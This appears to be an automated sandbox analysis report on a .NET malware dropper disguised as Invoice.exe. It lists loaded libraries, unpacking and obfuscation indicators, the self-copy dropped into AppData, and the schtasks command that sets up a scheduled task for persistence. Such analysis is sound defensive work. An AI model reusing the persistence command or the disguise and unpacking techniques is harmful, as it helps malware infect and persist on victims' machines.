Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\Invoice.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Invoice.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Invoice.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Invoice.exe

Static file information: File size 1085952 > 1048576

Source: Invoice.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x100a00

Source: Invoice.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Invoice.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: mscorlib.pdbMZ source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.Xml.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Accessibility.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.ni.pdbRSDS source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: AofI.pdb source: Invoice.exe, WER5BC8.tmp.dmp.12.dr, HbxYXheklrhvR.exe.0.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Configuration.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Accessibility.pdbT source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.Xml.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Accessibility.pdba source: WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Drawing.pdbH source: WER7A2D.tmp.dmp.22.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: mscorlib.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Windows.Forms.pdb4 source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: AofI.pdbSHA256 source: Invoice.exe, WER5BC8.tmp.dmp.12.dr, HbxYXheklrhvR.exe.0.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Drawing.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: mscorlib.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.pdb` source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.pdbL0uw# source: WER5BC8.tmp.dmp.12.dr
Source:	Binary string: System.ni.pdb source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER5BC8.tmp.dmp.12.dr, WER7A2D.tmp.dmp.22.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Invoice.exe.2bf4248.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	.Net Code: XGGc31A38G System.Reflection.Assembly.Load(byte[])
Source: 0.2.Invoice.exe.53b0000.4.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	.Net Code: XGGc31A38G System.Reflection.Assembly.Load(byte[])
Source: 13.2.HbxYXheklrhvR.exe.2fa42a8.0.raw.unpack, .cs	.Net Code: System.Reflection.Assembly.Load(byte[])

Source: Invoice.exe	Static PE information: section name: .text entropy: 7.106139641001328
Source: HbxYXheklrhvR.exe.0.dr	Static PE information: section name: .text entropy: 7.106139641001328

Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, b1mj4XO2Pkc5GNQYph.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NiGRsIgiWa', 'bLJRJI0s4N', 'pE2RzO26Bs', 'POAnDHC3Gj', 'Mo7nF8qb7m', 'NqVnR75toQ', 'rNgnnDB4LJ', 'HPmZVDRVYS1H7rlCly0'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, dQA5T4hIWSScrswBPb.cs	High entropy of concatenated method names: 'mm9Odvtd6S', 'we5OPy5naL', 'CXsOI5W5LW', 'lB4OhTncAt', 'dv2O5AnZ5a', 'HgdO66Es97', 'uyLO8Ityn8', 'OblO1EW2f7', 'c0uOatJ0Z6', 'PbQOGXcGwI'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, Pft0PaCIgE8WGPsp0R.cs	High entropy of concatenated method names: 'Dispose', 'mwFFsMO03N', 'AFMRmii4sm', 'E72tbs80qR', 'g9IFJPUYOu', 'aWaFzJ5UeF', 'ProcessDialogKey', 'PwrRDFS1qr', 'MpCRF7Ym1b', 'Ry5RR7Wb19'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, vxfLmDRQICTvsiC6nC.cs	High entropy of concatenated method names: 'i0P3m9WBS', 'KuIdVVy5Y', 'RxhPaQZ9S', 'slfNY7Y3x', 'CdFhD9xJj', 'CytbGFWwR', 'TCvpioBE9xO3mQRh3a', 'UgXp8lXmkaXHbsqurT', 'Xed1FCMAU', 'HPnGqei0D'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, dgLyh8FDWU9lGjAbaNQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IatGlJLQGl', 'thWGUAFa2d', 'd6PG2xtIxg', 'oIKGihvXw2', 'WaaGtCye3k', 'mnsGk2JwMm', 'w0NGAIZoTf'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	High entropy of concatenated method names: 'bKnneJ8k3g', 'QdAnMAJNW6', 'lMinCFtU8k', 'rqhnOKIv7M', 'aAbnXFdmWk', 'oJOnQGRZJx', 'm52nwc0Eq2', 'QRdnZaOP75', 'hVjng1W37j', 'gQvn4WyoSi'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, GQLKFDWZb4o6lvk7Ds.cs	High entropy of concatenated method names: 'JTS80CWShY', 'KPm8JTNGDy', 'dfG1DI1KKH', 'Xls1Fa9KwX', 'OXG8lPNRBi', 'JQ68U5GN14', 'JXi82ywQdp', 'X2l8itTP1f', 'SZR8tHpvlu', 'u2Y8kbAyii'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, Ly7rDAioQtWieapuvq.cs	High entropy of concatenated method names: 'xWt5Yoxumo', 'dci5UQ0whp', 'D6H5iVluMm', 'm6O5tGs3rL', 'DYi5m9f1PT', 'fEy5qTHKDZ', 'AkX5BbPvBe', 'H2v5j904sL', 'C1W598FaKO', 'k2W5S6WKoN'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, WFS1qrsopC7Ym1bty5.cs	High entropy of concatenated method names: 'F81axkxyYf', 'jkAamJy6Kb', 'YWAaq82cvF', 'y0kaB51iMg', 'knsajSuIi3', 'lrya90jB56', 'bYiaSFnYkS', 'M2xaKFiXfS', 't4yao2bcg8', 'mrraYUmnN5'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, oB70g2z9k0WDBiEEwl.cs	High entropy of concatenated method names: 'dMSGPonrB9', 'BhOGIrStp3', 'LTVGhwWZcA', 'znqGxLwxRS', 'y5gGmiHXns', 'liMGB8suqQ', 'nQxGjsaOWG', 'EuwGu4Q5i4', 'b3QGE5ylGO', 'oKZGy8KDcO'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, so214WIr6LYMrBtinr.cs	High entropy of concatenated method names: 'hdNCij79dw', 'O1oCtnJsLh', 'LjYCkVdlhO', 'wwRCAkrmMR', 'AO4CLrpJ1a', 'J0MCWdHfo3', 'xhoCrO3KEX', 'HTdC0YKHBl', 'UOVCsUm5ZD', 'zR9CJkyjqp'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, nfFa20x6ssnQ2M0cam.cs	High entropy of concatenated method names: 'EmUQeqoedA', 'UG6QCKIPe6', 'wU5QX43RMf', 'N8FQwfRbnu', 'o3JQZrhPqL', 'ff4XLEjaf0', 'xJ6XWNk5hu', 'dZhXru3MeC', 'FKTX0KwtlN', 'cKJXsjmEvA'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, YtAaKio9YQBdCYcSxU.cs	High entropy of concatenated method names: 'vBswEwZI1d', 'x92wye6vc8', 'UCRw3OT27y', 'jPswd2T4Ye', 'tGWwHKHK9i', 'WdDwPglBSt', 'ziWwNcNWr0', 'W3NwINS4f4', 'gKWwhvs5Wp', 'xOewbeN2gG'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, uWb196Js7Cv4sl5UEY.cs	High entropy of concatenated method names: 'fd6GO03NMc', 'H6YGXcr4D8', 'TNHGQQsCpR', 'XYlGwU5Vui', 'Bm3GaNXaMO', 'mHfGZYnVMh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, cURNxtSKOH9BmxQDT9.cs	High entropy of concatenated method names: 'GtFwMjsrgE', 'etJwOmKfg7', 'YY0wQEYcED', 'sNsQJPe0Ix', 'zC7QzkcRKn', 'CBNwDfEMJX', 'ROlwFsRnSL', 'RbMwRoPUVT', 'vHrwnApSdu', 'uLuwctd40h'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, fgAjAvbhkyjrUBMRgy.cs	High entropy of concatenated method names: 'zqpXHC7CPg', 'uuTXNZoSQW', 'OP4OqJm9yV', 'aJ6OBw9GOD', 'jCLOj8VakS', 'SZUO9eJSR5', 'A8bOSLT5Ac', 'XO6OKakdU6', 'c7HOof7LXh', 'QSCOYQPGp2'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, W5vy5NFFunV5KQTcKWa.cs	High entropy of concatenated method names: 'EmQGJTtUxd', 'ruxGzvb6Mj', 'Ay4pDsK3j6', 'lyspFmHB2s', 'fNJpRPdlNF', 'bDlpnD6fQB', 'uHgpc7UL7d', 'qj2peinvZV', 'HsdpMApDOZ', 'WOBpCO6V6e'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, NUMgVerI54wFMO03NO.cs	High entropy of concatenated method names: 'Y0ra589v9L', 'b0wa8YZ9ZQ', 'iOcaa5CEmB', 'HkNapciOdy', 'hPcaTONQ7q', 'ftjauMjSEn', 'Dispose', 'oUq1MgNEei', 'rT71CBu545', 'SVB1OM8ZAU'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, XVUjLnFRiYJ9SWeahSI.cs	High entropy of concatenated method names: 'ToString', 'JXEpIWFpMU', 'xkyphSisNX', 'eMVpbh5ie7', 'J1MpxXWo6m', 'HBQpmGlOlL', 'piZpq5rq5n', 'Jf3pB05e6q', 'UUnnnVwwGd04TRHAxmO', 'FB3Qu4wMo4CoZtljriA'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, fmsETu2FBSdJ6G3ldK.cs	High entropy of concatenated method names: 'tPjVIBemZB', 'hoAVhNdqbj', 'GE2VxQQ3v6', 'FyeVmkULVr', 'qrLVBLlRsI', 'QkUVjWtwiA', 'w8UVSgNrgd', 'rPoVKtTyNg', 'FNNVYp8kbV', 'JheVlZCoSI'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, FA5eSGBZhQuL9mHXNk.cs	High entropy of concatenated method names: 'yBUQuOYkEo', 'SgsQEWVmUo', 'ShqQ3aVTsW', 'xsvQdfylsp', 'y80QPYwC1T', 'Y7CQNYaO6c', 'jcFQhKjd8r', 'KZ5QblDVua', 'ynHYhNHfIM0eiIb4X7w', 'FvY7rhHUyNbLBb53tZd'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, gU6bc5cWlvSIKRLMY9.cs	High entropy of concatenated method names: 'qbaFwo214W', 'W6LFZYMrBt', 'mIWF4SScrs', 'jBPFfbMgAj', 'IMRF5gyVfF', 's20F66ssnQ', 'oZ6TkFeIeZrYLJiwrr', 'b4butdkRjT2RF1uuJc', 'LZuFFjpbDj', 'OLOFntkBN9'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, kUQe3RkBS6AEFBPFdC.cs	High entropy of concatenated method names: 'ToString', 'll46lOk298', 'BNe6mnx4T3', 'Ov16q30VAr', 'YiP6BB2D9x', 'Hox6jIQ5kQ', 'Uhp69cywgm', 'EmC6SFHYvQ', 'dTc6KfthXw', 'YkB6oG0efF'
Source: 0.2.Invoice.exe.5eb0000.5.raw.unpack, nSQu88FcVhDSYUikxOq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AD07a03qKE', 'tHT7Gl5LIU', 'ndJ7pwwRYm', 'Uuq77J8byG', 'Hya7TZSXGi', 'BRl7vjjqPN', 'jjZ7urocBd'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, b1mj4XO2Pkc5GNQYph.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NiGRsIgiWa', 'bLJRJI0s4N', 'pE2RzO26Bs', 'POAnDHC3Gj', 'Mo7nF8qb7m', 'NqVnR75toQ', 'rNgnnDB4LJ', 'HPmZVDRVYS1H7rlCly0'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, dQA5T4hIWSScrswBPb.cs	High entropy of concatenated method names: 'mm9Odvtd6S', 'we5OPy5naL', 'CXsOI5W5LW', 'lB4OhTncAt', 'dv2O5AnZ5a', 'HgdO66Es97', 'uyLO8Ityn8', 'OblO1EW2f7', 'c0uOatJ0Z6', 'PbQOGXcGwI'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, Pft0PaCIgE8WGPsp0R.cs	High entropy of concatenated method names: 'Dispose', 'mwFFsMO03N', 'AFMRmii4sm', 'E72tbs80qR', 'g9IFJPUYOu', 'aWaFzJ5UeF', 'ProcessDialogKey', 'PwrRDFS1qr', 'MpCRF7Ym1b', 'Ry5RR7Wb19'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, vxfLmDRQICTvsiC6nC.cs	High entropy of concatenated method names: 'i0P3m9WBS', 'KuIdVVy5Y', 'RxhPaQZ9S', 'slfNY7Y3x', 'CdFhD9xJj', 'CytbGFWwR', 'TCvpioBE9xO3mQRh3a', 'UgXp8lXmkaXHbsqurT', 'Xed1FCMAU', 'HPnGqei0D'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, dgLyh8FDWU9lGjAbaNQ.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IatGlJLQGl', 'thWGUAFa2d', 'd6PG2xtIxg', 'oIKGihvXw2', 'WaaGtCye3k', 'mnsGk2JwMm', 'w0NGAIZoTf'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, UVWH2oZfgsIeUHjbMP.cs	High entropy of concatenated method names: 'bKnneJ8k3g', 'QdAnMAJNW6', 'lMinCFtU8k', 'rqhnOKIv7M', 'aAbnXFdmWk', 'oJOnQGRZJx', 'm52nwc0Eq2', 'QRdnZaOP75', 'hVjng1W37j', 'gQvn4WyoSi'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, GQLKFDWZb4o6lvk7Ds.cs	High entropy of concatenated method names: 'JTS80CWShY', 'KPm8JTNGDy', 'dfG1DI1KKH', 'Xls1Fa9KwX', 'OXG8lPNRBi', 'JQ68U5GN14', 'JXi82ywQdp', 'X2l8itTP1f', 'SZR8tHpvlu', 'u2Y8kbAyii'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, Ly7rDAioQtWieapuvq.cs	High entropy of concatenated method names: 'xWt5Yoxumo', 'dci5UQ0whp', 'D6H5iVluMm', 'm6O5tGs3rL', 'DYi5m9f1PT', 'fEy5qTHKDZ', 'AkX5BbPvBe', 'H2v5j904sL', 'C1W598FaKO', 'k2W5S6WKoN'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, WFS1qrsopC7Ym1bty5.cs	High entropy of concatenated method names: 'F81axkxyYf', 'jkAamJy6Kb', 'YWAaq82cvF', 'y0kaB51iMg', 'knsajSuIi3', 'lrya90jB56', 'bYiaSFnYkS', 'M2xaKFiXfS', 't4yao2bcg8', 'mrraYUmnN5'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, oB70g2z9k0WDBiEEwl.cs	High entropy of concatenated method names: 'dMSGPonrB9', 'BhOGIrStp3', 'LTVGhwWZcA', 'znqGxLwxRS', 'y5gGmiHXns', 'liMGB8suqQ', 'nQxGjsaOWG', 'EuwGu4Q5i4', 'b3QGE5ylGO', 'oKZGy8KDcO'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, so214WIr6LYMrBtinr.cs	High entropy of concatenated method names: 'hdNCij79dw', 'O1oCtnJsLh', 'LjYCkVdlhO', 'wwRCAkrmMR', 'AO4CLrpJ1a', 'J0MCWdHfo3', 'xhoCrO3KEX', 'HTdC0YKHBl', 'UOVCsUm5ZD', 'zR9CJkyjqp'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, nfFa20x6ssnQ2M0cam.cs	High entropy of concatenated method names: 'EmUQeqoedA', 'UG6QCKIPe6', 'wU5QX43RMf', 'N8FQwfRbnu', 'o3JQZrhPqL', 'ff4XLEjaf0', 'xJ6XWNk5hu', 'dZhXru3MeC', 'FKTX0KwtlN', 'cKJXsjmEvA'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, YtAaKio9YQBdCYcSxU.cs	High entropy of concatenated method names: 'vBswEwZI1d', 'x92wye6vc8', 'UCRw3OT27y', 'jPswd2T4Ye', 'tGWwHKHK9i', 'WdDwPglBSt', 'ziWwNcNWr0', 'W3NwINS4f4', 'gKWwhvs5Wp', 'xOewbeN2gG'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, uWb196Js7Cv4sl5UEY.cs	High entropy of concatenated method names: 'fd6GO03NMc', 'H6YGXcr4D8', 'TNHGQQsCpR', 'XYlGwU5Vui', 'Bm3GaNXaMO', 'mHfGZYnVMh', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, cURNxtSKOH9BmxQDT9.cs	High entropy of concatenated method names: 'GtFwMjsrgE', 'etJwOmKfg7', 'YY0wQEYcED', 'sNsQJPe0Ix', 'zC7QzkcRKn', 'CBNwDfEMJX', 'ROlwFsRnSL', 'RbMwRoPUVT', 'vHrwnApSdu', 'uLuwctd40h'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, fgAjAvbhkyjrUBMRgy.cs	High entropy of concatenated method names: 'zqpXHC7CPg', 'uuTXNZoSQW', 'OP4OqJm9yV', 'aJ6OBw9GOD', 'jCLOj8VakS', 'SZUO9eJSR5', 'A8bOSLT5Ac', 'XO6OKakdU6', 'c7HOof7LXh', 'QSCOYQPGp2'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, W5vy5NFFunV5KQTcKWa.cs	High entropy of concatenated method names: 'EmQGJTtUxd', 'ruxGzvb6Mj', 'Ay4pDsK3j6', 'lyspFmHB2s', 'fNJpRPdlNF', 'bDlpnD6fQB', 'uHgpc7UL7d', 'qj2peinvZV', 'HsdpMApDOZ', 'WOBpCO6V6e'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, NUMgVerI54wFMO03NO.cs	High entropy of concatenated method names: 'Y0ra589v9L', 'b0wa8YZ9ZQ', 'iOcaa5CEmB', 'HkNapciOdy', 'hPcaTONQ7q', 'ftjauMjSEn', 'Dispose', 'oUq1MgNEei', 'rT71CBu545', 'SVB1OM8ZAU'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, XVUjLnFRiYJ9SWeahSI.cs	High entropy of concatenated method names: 'ToString', 'JXEpIWFpMU', 'xkyphSisNX', 'eMVpbh5ie7', 'J1MpxXWo6m', 'HBQpmGlOlL', 'piZpq5rq5n', 'Jf3pB05e6q', 'UUnnnVwwGd04TRHAxmO', 'FB3Qu4wMo4CoZtljriA'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, fmsETu2FBSdJ6G3ldK.cs	High entropy of concatenated method names: 'tPjVIBemZB', 'hoAVhNdqbj', 'GE2VxQQ3v6', 'FyeVmkULVr', 'qrLVBLlRsI', 'QkUVjWtwiA', 'w8UVSgNrgd', 'rPoVKtTyNg', 'FNNVYp8kbV', 'JheVlZCoSI'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, FA5eSGBZhQuL9mHXNk.cs	High entropy of concatenated method names: 'yBUQuOYkEo', 'SgsQEWVmUo', 'ShqQ3aVTsW', 'xsvQdfylsp', 'y80QPYwC1T', 'Y7CQNYaO6c', 'jcFQhKjd8r', 'KZ5QblDVua', 'ynHYhNHfIM0eiIb4X7w', 'FvY7rhHUyNbLBb53tZd'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, gU6bc5cWlvSIKRLMY9.cs	High entropy of concatenated method names: 'qbaFwo214W', 'W6LFZYMrBt', 'mIWF4SScrs', 'jBPFfbMgAj', 'IMRF5gyVfF', 's20F66ssnQ', 'oZ6TkFeIeZrYLJiwrr', 'b4butdkRjT2RF1uuJc', 'LZuFFjpbDj', 'OLOFntkBN9'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, kUQe3RkBS6AEFBPFdC.cs	High entropy of concatenated method names: 'ToString', 'll46lOk298', 'BNe6mnx4T3', 'Ov16q30VAr', 'YiP6BB2D9x', 'Hox6jIQ5kQ', 'Uhp69cywgm', 'EmC6SFHYvQ', 'dTc6KfthXw', 'YkB6oG0efF'
Source: 0.2.Invoice.exe.3ccc530.3.raw.unpack, nSQu88FcVhDSYUikxOq.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'AD07a03qKE', 'tHT7Gl5LIU', 'ndJ7pwwRYm', 'Uuq77J8byG', 'Hya7TZSXGi', 'BRl7vjjqPN', 'jjZ7urocBd'

Source: C:\Users\user\Desktop\Invoice.exe

File created: C:\Users\user\AppData\Roaming\HbxYXheklrhvR.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Invoice.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HbxYXheklrhvR" /XML "C:\Users\user\AppData\Local\Temp\tmpE22E.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
